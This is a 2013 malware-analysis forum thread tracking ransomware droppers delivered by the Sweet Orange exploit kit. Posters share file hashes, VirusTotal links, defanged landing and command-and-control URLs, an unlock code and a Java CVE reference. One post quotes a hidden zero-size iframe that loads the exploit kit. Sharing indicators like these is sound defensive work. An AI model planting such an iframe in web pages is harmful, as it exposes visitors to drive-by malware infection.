A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18668  by EP_X0FF
 Sat Mar 23, 2013 2:47 pm
I think it bugged, as it impossible to enter correct deactivation code.

Image

As for me, new appearance looks much better. Asks for ~65$ hm, inflation, I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
You do not have the required permissions to view the files attached to this post.
 #19120  by EP_X0FF
 Tue Apr 30, 2013 12:25 pm
Dropper, payload of Sweet Orange EK.

Iframe to EK.
Code: Select all
<iframe src="hxxp://df.pizdafyqib.ru/administrator/weather.php?browse=151 width="0" height="0" frameborder="0"></iframe>
SHA256: 11761b0b7d20efe6815f900cf8a0242dae9dec29ee0e309fd1b288e7b9b1c0ef
SHA1: 75dcb3332f21aa31bac16429290e7f6285184824
MD5: a73f6edd6f698edd692fbfe86855f6a4

https://www.virustotal.com/en/file/1176 ... /analysis/

EXE + Jar (CVE-2012-1723) in attach. Keep your Java up to date, or better get rid of it once and for all.
You do not have the required permissions to view the files attached to this post.
 #19122  by Xylitol
 Tue Apr 30, 2013 1:09 pm
EP_X0FF wrote:Keep your Java up to date
urlquery got winlocked when i submitted the site http://urlquery.net/report.php?id=2243853
Code: Select all
urlQuery Alerts	 No alerts detected
even not detected as sweet orange :)
C&C:
Code: Select all
hxxp://df.pizdafyqib.ru:8581/aw/index.php?m=stats
• dns: 1 ›› ip: 216.246.54.231 - adresse: DF.PIZDAFYQIB.RU
• dns: 1 ›› ip: 216.246.54.231 - adresse: B2B-VM6.VERTICALCOMMUNICATION.IN
 #19130  by mrbelyash
 Wed May 01, 2013 8:17 am
EP_X0FF wrote:I think it bugged, as it impossible to enter correct deactivation code.

Image

As for me, new appearance looks much better. Asks for ~65$ hm, inflation, I remember they started from ~15$ in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
unlock code 121255545

http://stop-winlock.ru/2013/05/01/troja ... 15437.html
 #19166  by Xylitol
 Thu May 02, 2013 7:21 pm
EP_X0FF wrote:
Code: Select all
hxxp://wsd.nuwazy.ru/sites/oplata/codestariff/themes.php?strategy=154
Code: Select all
• dns: 1 ›› ip: 64.202.124.84 - adresse: WSD.NUWAZY.RU
hXXp://wsd.nuwazy.ru:8581/aw/
https://www.virustotal.com/ru/file/24f0 ... 367522337/
http://www.threatexpert.com/report.aspx ... c791b71390
Java 6 update 17 is enought to get the sample.
You do not have the required permissions to view the files attached to this post.
 #19180  by EP_X0FF
 Fri May 03, 2013 5:52 pm
Fresh
Code: Select all
hxxp://za.omovigminet.ru/bugs/books/partner/themes.php?strategy=156
SHA256: e1dc306f502657cdc57fc4608aa6b4815747001478bf770afe7ec363fc264a8f
SHA1: 7d12a710f463d79e23ffe4f1bd94942537c3e868
MD5: c2b46eb6e92ebf65e9e8d580f17ecb98

https://www.virustotal.com/en/file/e1dc ... 367603355/
You do not have the required permissions to view the files attached to this post.
 #19263  by EP_X0FF
 Mon May 13, 2013 1:36 pm
Fresh
Code: Select all
hxxp://rl7bh.ru/guest/recent.php?forums=170
landing
Code: Select all
hxxp://z.ylyzafaq.ru/xx/
SHA256: 0bfbbf1eb94a2fb9004847a0b008c5fc688b0a04665f18dba3ef9a91c1a5dc87
SHA1: 4def049567188969f050893e93a8f61062182473
MD5: eb6f708178d87cec2e2588a379c23285

https://www.virustotal.com/ru/file/0bfb ... 368451928/
You do not have the required permissions to view the files attached to this post.
  • 1
  • 3
  • 4
  • 5
  • 6
  • 7